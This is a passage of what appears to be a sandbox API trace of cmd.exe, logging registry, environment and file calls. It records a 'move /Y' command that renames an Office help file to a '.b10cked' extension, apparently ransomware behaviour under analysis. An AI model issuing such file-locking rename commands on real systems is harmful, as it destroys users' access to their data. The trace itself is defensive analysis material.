ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfd2c | out: phkResult=0x1cfd2c*=0x0) returned 0x2 [0201.703] VirtualQuery (in: lpAddress=0x1cfd63, lpBuffer=0x1cfcfc, dwLength=0x1c | out: lpBuffer=0x1cfcfc*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.703] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfcfc, dwLength=0x1c | out: lpBuffer=0x1cfcfc*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0201.703] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfcfc, dwLength=0x1c | out: lpBuffer=0x1cfcfc*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0201.703] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfcfc, dwLength=0x1c | out: lpBuffer=0x1cfcfc*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.703] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfcfc, dwLength=0x1c | out: lpBuffer=0x1cfcfc*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0201.703] GetConsoleOutputCP () returned 0x1b5 [0201.716] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.716] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0201.716] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.716] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0201.718] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.718] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.719] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.719] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 
[0201.724] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.724] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.725] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.725] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0201.727] GetEnvironmentStringsW () returned 0x3c0188* [0201.727] FreeEnvironmentStringsW (penv=0x3c0188) returned 1 [0201.727] GetEnvironmentStringsW () returned 0x3c0188* [0201.727] FreeEnvironmentStringsW (penv=0x3c0188) returned 1 [0201.727] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cec9c | out: phkResult=0x1cec9c*=0x40) returned 0x0 [0201.727] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x0, lpData=0x1ceca8*=0xb0, lpcbData=0x1ceca0*=0x1000) returned 0x2 [0201.727] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x4, lpData=0x1ceca8*=0x1, lpcbData=0x1ceca0*=0x4) returned 0x0 [0201.727] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x0, lpData=0x1ceca8*=0x1, lpcbData=0x1ceca0*=0x1000) returned 0x2 [0201.727] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x4, lpData=0x1ceca8*=0x0, lpcbData=0x1ceca0*=0x4) returned 0x0 [0201.727] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x4, lpData=0x1ceca8*=0x40, lpcbData=0x1ceca0*=0x4) returned 0x0 [0201.727] RegQueryValueExW (in: hKey=0x40, 
lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x4, lpData=0x1ceca8*=0x40, lpcbData=0x1ceca0*=0x4) returned 0x0 [0201.727] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x0, lpData=0x1ceca8*=0x40, lpcbData=0x1ceca0*=0x1000) returned 0x2 [0201.727] RegCloseKey (hKey=0x40) returned 0x0 [0201.727] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cec9c | out: phkResult=0x1cec9c*=0x40) returned 0x0 [0201.728] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x0, lpData=0x1ceca8*=0x40, lpcbData=0x1ceca0*=0x1000) returned 0x2 [0201.728] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x4, lpData=0x1ceca8*=0x1, lpcbData=0x1ceca0*=0x4) returned 0x0 [0201.728] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x0, lpData=0x1ceca8*=0x1, lpcbData=0x1ceca0*=0x1000) returned 0x2 [0201.728] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x4, lpData=0x1ceca8*=0x0, lpcbData=0x1ceca0*=0x4) returned 0x0 [0201.728] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x4, lpData=0x1ceca8*=0x9, lpcbData=0x1ceca0*=0x4) returned 0x0 [0201.728] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ceca4, 
lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x4, lpData=0x1ceca8*=0x9, lpcbData=0x1ceca0*=0x4) returned 0x0 [0201.728] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x0, lpData=0x1ceca8*=0x9, lpcbData=0x1ceca0*=0x1000) returned 0x2 [0201.728] RegCloseKey (hKey=0x40) returned 0x0 [0201.728] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a3 [0201.728] srand (_Seed=0x5b8863a3) [0201.728] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.14.1033.hxn.b10cked\"" [0201.728] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.14.1033.hxn.b10cked\"" [0201.728] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.729] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c18e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0201.729] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0201.729] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0201.729] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.729] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0201.729] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0201.729] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") 
returned 13 [0201.729] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0201.729] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0201.729] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0201.729] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0201.729] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0201.729] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0201.729] GetEnvironmentStringsW () returned 0x3c22d8* [0201.729] FreeEnvironmentStringsW (penv=0x3c22d8) returned 1 [0201.729] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.729] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.730] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0201.730] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0201.730] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0201.730] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0201.730] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0201.730] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0201.730] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0201.730] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0201.730] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cfa68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.730] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cfa68, lpFilePart=0x1cfa64 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cfa64*="Desktop") returned 0x18 [0201.730] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.730] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf7e4 
| out: lpFindFileData=0x1cf7e4) returned 0x3c0018 [0201.730] FindClose (in: hFindFile=0x3c0018 | out: hFindFile=0x3c0018) returned 1 [0201.730] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf7e4 | out: lpFindFileData=0x1cf7e4) returned 0x3c0018 [0201.730] FindClose (in: hFindFile=0x3c0018 | out: hFindFile=0x3c0018) returned 1 [0201.731] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf7e4 | out: lpFindFileData=0x1cf7e4) returned 0x3c0018 [0201.731] FindClose (in: hFindFile=0x3c0018 | out: hFindFile=0x3c0018) returned 1 [0201.731] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.731] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0201.731] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0201.731] GetEnvironmentStringsW () returned 0x3c2af8* [0201.731] FreeEnvironmentStringsW (penv=0x3c2af8) returned 1 [0201.731] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.732] GetConsoleOutputCP () returned 0x1b5 [0201.752] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.752] GetUserDefaultLCID () returned 0x409 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfba8, cchData=128 | out: lpLCData="0") returned 2 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfba8, cchData=128 | out: lpLCData="0") returned 2 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfba8, cchData=128 | out: lpLCData="1") returned 2 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") 
returned 2 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0201.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0201.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0201.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0201.758] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0201.758] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0201.758] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0201.758] GetConsoleTitleW (in: lpConsoleTitle=0x3b08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.765] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.765] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0201.765] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0201.765] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0201.766] _wcsicmp (_String1="move", _String2=")") returned 68 [0201.766] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0201.766] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0201.766] _wcsicmp (_String1="IF", _String2="move") returned -4 [0201.766] 
_wcsicmp (_String1="IF/?", _String2="move") returned -4 [0201.766] _wcsicmp (_String1="REM", _String2="move") returned 5 [0201.766] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0201.769] GetConsoleTitleW (in: lpConsoleTitle=0x1cf8a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.785] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0201.785] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0201.785] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0201.785] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0201.785] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0201.785] _wcsicmp (_String1="move", _String2="CD") returned 10 [0201.785] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0201.786] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0201.786] _wcsicmp (_String1="move", _String2="REN") returned -5 [0201.786] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0201.786] _wcsicmp (_String1="move", _String2="SET") returned -6 [0201.786] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0201.786] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0201.786] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0201.786] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0201.786] _wcsicmp (_String1="move", _String2="MD") returned 11 [0201.786] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0201.786] _wcsicmp (_String1="move", _String2="RD") returned -5 [0201.786] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0201.786] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0201.786] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0201.786] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0201.786] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0201.786] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0201.786] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 
[0201.786] _wcsicmp (_String1="move", _String2="VER") returned -9 [0201.786] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0201.786] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0201.786] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0201.786] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0201.786] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0201.786] _wcsicmp (_String1="move", _String2="START") returned -6 [0201.786] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0201.786] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0201.786] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0201.788] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.788] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.788] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf65c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf654, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf654*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", 
_MaxCount=0x7) returned -5 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) 
returned -18 [0201.789] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0201.790] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0201.790] _wcsicmp (_String1="MSPOWE~1.HXN", _String2=".") returned 63 [0201.790] _wcsicmp (_String1="MSPOWE~1.HXN", _String2="..") returned 63 [0201.790] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mspowe~1.hxn")) returned 0x2022 [0201.790] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3c1e48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.790] SetErrorMode (uMode=0x0) returned 0x0 [0201.790] SetErrorMode (uMode=0x1) returned 0x0 [0201.790] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN", nBufferLength=0x104, lpBuffer=0x1cefe4, lpFilePart=0x1cefcc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN", lpFilePart=0x1cefcc*="MSPOWE~1.HXN") returned 0x27 [0201.790] SetErrorMode (uMode=0x0) returned 0x1 [0201.790] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0201.790] _wcsicmp (_String1="MSPOWE~1.HXN", _String2=".") returned 63 [0201.790] _wcsicmp (_String1="MSPOWE~1.HXN", _String2="..") returned 63 [0201.790] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mspowe~1.hxn")) returned 0x2022 [0201.790] SetErrorMode (uMode=0x0) returned 0x0 [0201.790] SetErrorMode (uMode=0x1) returned 0x0 [0201.791] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN", nBufferLength=0x104, lpBuffer=0x1cf460, lpFilePart=0x1cf1f8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN", lpFilePart=0x1cf1f8*="MSPOWE~1.HXN") returned 0x27 [0201.791] SetErrorMode (uMode=0x0) returned 0x1 [0201.791] SetErrorMode (uMode=0x0) returned 0x0 [0201.791] SetErrorMode (uMode=0x1) returned 0x0 
[0201.791] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x1cf668, lpFilePart=0x1cf1f8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.14.1033.hxn.b10cked", lpFilePart=0x1cf1f8*="MS.POWERPNT.14.1033.hxn.b10cked") returned 0x3a [0201.791] SetErrorMode (uMode=0x0) returned 0x1 [0201.791] SetLastError (dwErrCode=0x0) [0201.791] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.powerpnt.14.1033.hxn.b10cked")) returned 0xffffffff [0201.791] GetLastError () returned 0x2 [0201.791] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ceb74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb74) returned 0x3b0e78 [0201.791] FindNextFileW (in: hFindFile=0x3b0e78, lpFindFileData=0x1ceb74 | out: lpFindFileData=0x1ceb74) returned 0 [0201.792] FindClose (in: hFindFile=0x3b0e78 | out: hFindFile=0x3b0e78) returned 1 [0201.792] GetLastError () returned 0x12 [0201.792] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ceb74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb74) returned 0x3b0e78 [0201.792] FindNextFileW (in: hFindFile=0x3b0e78, lpFindFileData=0x1ceb74 | out: lpFindFileData=0x1ceb74) returned 0 [0201.792] FindClose (in: hFindFile=0x3b0e78 | out: hFindFile=0x3b0e78) returned 1 [0201.792] GetLastError () returned 0x12 [0201.793] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3c1be8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1be8) returned 0x3b0e78 [0201.793] FindNextFileW (in: hFindFile=0x3b0e78, lpFindFileData=0x3c1be8 | out: lpFindFileData=0x3c1be8) returned 0 [0201.793] 
FindClose (in: hFindFile=0x3b0e78 | out: hFindFile=0x3b0e78) returned 1 [0201.793] GetLastError () returned 0x12 [0201.793] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3c1be8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1be8) returned 0x3b0e78 [0201.793] FindNextFileW (in: hFindFile=0x3b0e78, lpFindFileData=0x3c1be8 | out: lpFindFileData=0x3c1be8) returned 0 [0201.793] FindClose (in: hFindFile=0x3b0e78 | out: hFindFile=0x3b0e78) returned 1 [0201.793] GetLastError () returned 0x12 [0201.793] _get_osfhandle (_FileHandle=2) returned 0xb [0201.793] GetFileType (hFile=0xb) returned 0x2 [0201.835] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0201.835] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ced44 | out: lpMode=0x1ced44) returned 1 [0201.836] _get_osfhandle (_FileHandle=2) returned 0xb [0201.836] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1ced78 | out: lpConsoleScreenBufferInfo=0x1ced78) returned 1 [0201.837] 